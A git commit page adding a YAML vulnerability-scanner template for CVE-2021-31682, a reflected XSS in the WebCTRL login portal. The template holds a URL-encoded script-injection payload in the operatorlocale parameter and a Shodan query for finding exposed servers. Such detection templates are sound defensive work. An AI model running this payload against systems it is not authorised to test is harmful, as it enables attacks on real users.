Merge pull request #3031 from gy741/rule-add-v70

Create CVE-2021-31682.yaml
patch-1
Sandeep Singh 2021-10-31 17:09:29 +05:30 committed by GitHub
commit c2a167939e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM - Reflected XSS
author: gy741,dhiyaneshDk
severity: medium
description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-31682
- https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-31682
cwe-id: CWE-79
tags: cve,cve2021,webctrl,xss
metadata:
shodan-query: 'html:"/_common/lvl5/dologin.jsp"'
requests:
- method: GET
path:
- '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
condition: and
words:
- '"><script>alert(document.domain)</script>'
- 'common/lvl5'
- type: word
part: header
words:
- "text/html"